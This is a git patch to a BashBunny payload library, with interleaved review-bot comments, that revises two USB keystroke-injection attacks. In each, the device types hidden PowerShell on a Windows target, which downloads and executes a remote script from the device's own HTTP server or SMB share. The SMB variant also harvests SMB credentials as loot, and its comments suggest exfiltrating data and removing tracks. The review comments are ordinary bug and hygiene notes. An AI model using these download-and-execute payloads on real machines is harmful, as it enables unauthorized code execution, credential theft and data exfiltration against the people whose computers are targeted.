From 91c7c2276f24e97b1a43926d107e4a5bf9ddfef5 Mon Sep 17 00:00:00 2001
From: Hink
Date: Wed, 11 Oct 2017 11:42:03 -0500
Subject: [PATCH] cleaned up and extended

---
 .../psh_DownloadExec/{psh.txt => p.txt} | 0
 .../execution/psh_DownloadExec/payload.txt | 36 ++++++-----
 .../execution/psh_DownloadExec/readme.md | 2 +-
 .../psh_DownloadExecSMB/{psh.txt => p.txt} | 0
 .../execution/psh_DownloadExecSMB/payload.txt | 60 +++++++++----------
 .../execution/psh_DownloadExecSMB/readme.md | 10 +++-
 6 files changed, 55 insertions(+), 53 deletions(-)
 rename payloads/library/execution/psh_DownloadExec/{psh.txt => p.txt} (100%)
 rename payloads/library/execution/psh_DownloadExecSMB/{psh.txt => p.txt} (100%)

diff --git a/payloads/library/execution/psh_DownloadExec/psh.txt b/payloads/library/execution/psh_DownloadExec/p.txt
similarity index 100%
rename from payloads/library/execution/psh_DownloadExec/psh.txt
rename to payloads/library/execution/psh_DownloadExec/p.txt
diff --git a/payloads/library/execution/psh_DownloadExec/payload.txt b/payloads/library/execution/psh_DownloadExec/payload.txt
index e0e55353..a4b11ddf 100644
--- a/payloads/library/execution/psh_DownloadExec/payload.txt
+++ b/payloads/library/execution/psh_DownloadExec/payload.txt
@@ -8,7 +8,8 @@
 # Attackmodes: HID, RNDIS_ETHERNET
 # Firmware: >= 1.3
 #
-# Quick HID attack to retrieve and run powershell payload from BashBunny web server - ensure psh.txt exists in payload directory
+# Quick HID attack to retrieve and run powershell payload from BashBunny web server
+# ensure p.txt (your powershell payload) exists in payload directory
 #
 # | Attack Stage | Description |
 # | ------------------- | ---------------------------------------- |
@@ -18,41 +19,38 @@
 ATTACKMODE RNDIS_ETHERNET HID
 LED SETUP
+REQUIRETOOL gohttp
 GET HOST_IP
 GET SWITCH_POSITION
-# Set working dir
-PAYLOAD_DIR=/root/udisk/payloads/$SWITCH_POSITION
-SERVER_LOG=$PAYLOAD_DIR/server.log
+# DEFINE DIRECTORIES
+PAYLOAD_DIR=/root/udisk/payloads/${SWITCH_POSITION}
+SERVER_LOG=/tmp/server.log
-# Fresh Server Log
-rm -f $SERVER_LOG
+# SERVER LOG
+rm -f ${SERVER_LOG}
-# Check for gohttp
-REQUIRETOOL gohttp
-
-# Start web server
+# START HTTP SERVER
 iptables -A OUTPUT -p udp --dport 53 -j DROP # disallow outgoing dns requests so server starts immediately
-/usr/bin/gohttp -p 80 -d $PAYLOAD_DIR > $SERVER_LOG 2>&1 &
+/tools/gohttp/gohttp -p 80 -d /tmp/ > ${SERVER_LOG} 2>&1 &
-# Check for psh.txt
-if [ ! -f $PAYLOAD_DIR/psh.txt ]; then
+# CHECK FOR POWERSHELL
+if [ ! -f ${PAYLOAD_DIR}/p.txt ]; then
 LED FAIL2
 exit 1
 fi
+cp -R ${PAYLOAD_DIR}/* /tmp/ # any additional assets will be available in tmp
-# Attack HID
+# STAGE 1 - POWERSHELL
 LED STAGE1
-# Attack (abbreviations to allow run execution)
-RUN WIN "powershell -WindowStyle Hidden \"\$web=New-Object Net.WebClient;while (\$TRUE) {If ((New-Object net.sockets.tcpclient ('$HOST_IP','80')).Connected) {iex \$web.DownloadString('http://$HOST_IP/psh.txt');\$web.DownloadString('http://172.16.64.1/DONE');exit}}\""
+RUN WIN "powershell -WindowStyle Hidden \"\$web=New-Object Net.WebClient;while (\$TRUE) {If ((New-Object net.sockets.tcpclient ('${HOST_IP}','80')).Connected) {iex \$web.DownloadString('http://${HOST_IP}/p.txt');\$web.DownloadString('http://172.16.64.1/DONE');exit}}\""
 # Remove tracks in the psh payload if you wish
-# Attack Ethernet
+# STAGE 2 - WAIT
 LED STAGE2
-
-while ! grep -Fq "GET \"/DONE\"" $SERVER_LOG; do
+while ! grep -Fq "GET \"/DONE\"" ${SERVER_LOG}; do
 sleep .5
 done
diff --git a/payloads/library/execution/psh_DownloadExec/readme.md b/payloads/library/execution/psh_DownloadExec/readme.md
index 5d96fd13..1f61836e 100644
--- a/payloads/library/execution/psh_DownloadExec/readme.md
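Review bot: The `iptables -A OUTPUT -p udp --dport 53 -j DROP` rule kept in this hunk is appended on every run and nothing ever removes it; the script has no cleanup stage, so the rules accumulate and the device's outbound DNS stays blocked after the payload finishes. A cleanup step after the wait loop with the matching `iptables -D OUTPUT -p udp --dport 53 -j DROP` (and a kill of the backgrounded gohttp process) would return the device to its prior state. Separately, the served root is now all of `/tmp/` instead of the payload directory, so `/tmp/server.log` — the file the Stage 2 loop greps — and anything else in `/tmp` is readable over HTTP to any host on the RNDIS link, and `cp -R ${PAYLOAD_DIR}/* /tmp/` also publishes payload.txt itself. Serving a dedicated subdirectory and keeping the log outside it would limit that exposure.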
+++ b/payloads/library/execution/psh_DownloadExec/readme.md
@@ -14,7 +14,7 @@ Quick HID attack to retrieve and run powershell payload from BashBunny web serve
 ## Configuration
-Ensure psh.txt exists in payload directory. This is the powershell script that will be downloaded and executed.
+Ensure p.txt exists in payload directory. This is the powershell script that will be downloaded and executed.
 ## Requirements
diff --git a/payloads/library/execution/psh_DownloadExecSMB/psh.txt b/payloads/library/execution/psh_DownloadExecSMB/p.txt
similarity index 100%
rename from payloads/library/execution/psh_DownloadExecSMB/psh.txt
rename to payloads/library/execution/psh_DownloadExecSMB/p.txt
diff --git a/payloads/library/execution/psh_DownloadExecSMB/payload.txt b/payloads/library/execution/psh_DownloadExecSMB/payload.txt
index b05f2e2d..acc568ac 100644
--- a/payloads/library/execution/psh_DownloadExecSMB/payload.txt
+++ b/payloads/library/execution/psh_DownloadExecSMB/payload.txt
@@ -2,23 +2,23 @@
 #
 # Title: Powershell Download and Execute SMB
 # Author: LowValueTarget
-# Version: 1.2
+# Version: 2.0
 # Category: Powershell
 # Target: Windows XP SP3+ (Powershell)
 # Attackmodes: HID, RNDIS_ETHERNET
 # Firmware: >= 1.2
 #
-# Quick HID attack to retrieve and run powershell payload from BashBunny SMBServer. Credentials are stored as loot.
-# Ensure psh.txt exists in payload directory
+# Quick HID attack to retrieve and run powershell payload from BashBunny SMBServer. Possibilities are limitless!
+# Credentials captured by are stored as loot.
+# Ensure p.txt exists in payload directory (using .txt instead of .ps1 in case of security countermeasures)
 #
-# Requires Impacket is installed (python ./impacket/setup.py install)
+# Required tools: impacket
 #
 # | Attack Stage | Description |
 # | ------------------- | ------------------------------|
 # | Stage 1 | Powershell |
 # | Stage 2 | Delivering powershell payload |
 #
-
 ATTACKMODE RNDIS_ETHERNET HID
 # SETUP
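Review bot: The new header line `# Credentials captured by are stored as loot.` in the psh_DownloadExecSMB/payload.txt hunk is missing a word; `# Credentials captured by the SMB server are stored as loot.` reads as intended. The replacement `# Required tools: impacket` drops the install instruction without any runtime presence check for `/tools/impacket` (unlike the `REQUIRETOOL gohttp` added to the sibling payload), so pointing the header at the readme's installation section would help the next operator who hits a silent failure.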
@@ -29,48 +29,48 @@ GET SWITCH_POSITION
 GET TARGET_HOSTNAME
 GET HOST_IP
+# DEFINE DIRECTORIES
 PAYLOAD_DIR=/root/udisk/payloads/$SWITCH_POSITION
-# Check for psh.txt
-if [ ! -f ${PAYLOAD_DIR}/psh.txt ]; then
+LOOTDIR_BB=/root/udisk/loot/psh_DownloadExecSMB
+
+mkdir -p /tmp/{l,p}
+
+# CHECK FOR POWERSHELL
+if [ ! -f ${PAYLOAD_DIR}/p.txt ]; then
 LED FAIL
 exit 1
 fi
-cp -R ${PAYLOAD_DIR}/* /tmp/
+cp -R ${PAYLOAD_DIR}/* /tmp/p/ # any additional assets will be available in tmp
-LOOTDIR=/root/udisk/loot/psh_DownloadExecSMB
-# Setup named logs in loot directory
-mkdir -p ${LOOTDIR}
+# GET HOSTNAME
 HOST=${TARGET_HOSTNAME}
-# If hostname is blank set it to "noname"
-[[ -z "$HOST" ]] && HOST="noname"
-COUNT=$(ls -lad ${LOOTDIR}/$HOST* | wc -l)
+[[ -z "${HOST}" ]] && HOST="noname"
+COUNT=$(ls -lad ${LOOTDIR_BB}/${HOST}* | wc -l)
 COUNT=$((COUNT+1))
-mkdir -p ${LOOTDIR}/${HOST}-$COUNT
+mkdir -p ${LOOTDIR_BB}/${HOST}-${COUNT}
+LOOTDIR_BB=${LOOTDIR_BB}/${HOST}-${COUNT}
-# Log file
-LOGFILE=psh_smb.log
+# START SMB SERVER
+LOGFILE=/tmp/l/psh_downloadsmb.log
+touch ${LOGFILE}
+python /tools/impacket/examples/smbserver.py -comment 'Public Share' s /tmp > ${LOGFILE} &
-# Start SMB Server
-mkdir -p /loot
-python /tools/impacket/examples/smbserver.py -comment 'Public Share' s /tmp/ > /loot/${LOGFILE} &
-
-# STAGE 1 - Powershell
+# STAGE 1 - POWERSHELL
 LED STAGE1
+RUN WIN "powershell -WindowStyle Hidden \"while (\$true) {If ((New-Object net.sockets.tcpclient(${HOST_IP},445)).Connected) {iex (New-Object Net.WebClient).DownloadString('\\\\${HOST_IP}\\s\\p\\p.txt');New-Item \\\\${HOST_IP}\\s\\COMPLETE -ItemType file;exit}}\""
+# TIP: To exfil any data, upload to \\172.16.64.1\s\l\ -- this will be copied to the BB as loot
+# TIP: Remove tracks in the psh payload if you wish
-RUN WIN "powershell -WindowStyle Hidden \"while (\$true) { If ((New-Object net.sockets.tcpclient ($HOST_IP,445)).Connected) { iex (New-Object Net.WebClient).DownloadString('\\\\$HOST_IP\\s\\psh.txt');New-Item 
\\\172.16.64.1\\s\\COMPLETE -ItemType file;exit}}\""
-# Remove tracks in the psh payload if you wish
-
-# STAGE 2 - Wait until payload retrieved
-# Wait until payload is retrieved
+# STAGE 2 - HURRY UP AND WAIT
 LED STAGE2
 while ! [ -f /tmp/COMPLETE ]; do sleep 0.5; done
 # CLEANUP
 LED CLEANUP
-# Move loot to mass storage
-mv /loot/${LOGFILE} ${LOOTDIR}/${HOST}-$COUNT
-rm /loot/${LOGFILE}
+# STASH THE LOOT
+mv /tmp/l/* ${LOOTDIR_BB}/
+rm -rf /tmp/{l,p}
 # Sync file system
 sync
diff --git a/payloads/library/execution/psh_DownloadExecSMB/readme.md b/payloads/library/execution/psh_DownloadExecSMB/readme.md
index 42c29490..e8358628 100644
--- a/payloads/library/execution/psh_DownloadExecSMB/readme.md
+++ b/payloads/library/execution/psh_DownloadExecSMB/readme.md
@@ -10,12 +10,16 @@
 ## Description
-Quick HID attack to retrieve and run powershell payload from BashBunny SMBServer. Credentials are stored as loot.
+Quick HID attack to retrieve and run powershell payload from BashBunny SMBServer. SMB Credentials are stored as loot.
 ## Configuration
-* Ensure psh.txt exists in payload directory. This is the powershell script that will be downloaded and executed.
-* Requires Impacket is installed (python ./impacket/setup.py install)
+* Ensure p.txt exists in payload directory. This is the powershell script that will be downloaded and executed.
+* Requires Impacket
+
+__Installation__
+
+See Hak5's Tool Thread Here: https://forums.hak5.org/index.php?/topic/40971-info-tools/
 ## STATUS
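Review bot: The cleanup at the end of the psh_DownloadExecSMB/payload.txt hunk removes `/tmp/{l,p}` but not `/tmp/COMPLETE`, the marker that the Stage 2 loop `while ! [ -f /tmp/COMPLETE ]` polls for, so a marker left by an earlier run in the same boot would end the wait immediately; `rm -f /tmp/COMPLETE` before Stage 1, or in the cleanup block, closes that gap. The share root is `/tmp` and the new `LOGFILE=/tmp/l/psh_downloadsmb.log` — which per the header comment is where captured credentials land — now lives inside that share, so it is readable and overwritable through the share by any host on the link, and `mv /tmp/l/*` will move whatever gets written there onto the loot partition; keeping the log outside the shared tree avoids both problems. The line `COUNT=$(ls -lad ${LOOTDIR_BB}/${HOST}* | wc -l)` now emits an `ls` error on a fresh device because the old `mkdir -p ${LOOTDIR}` that created the parent directory was dropped; a `mkdir -p "${LOOTDIR_BB}"` before it, or `2>/dev/null` on the `ls`, keeps the first run quiet. Whether the script continues past `sync` is outside the hunk.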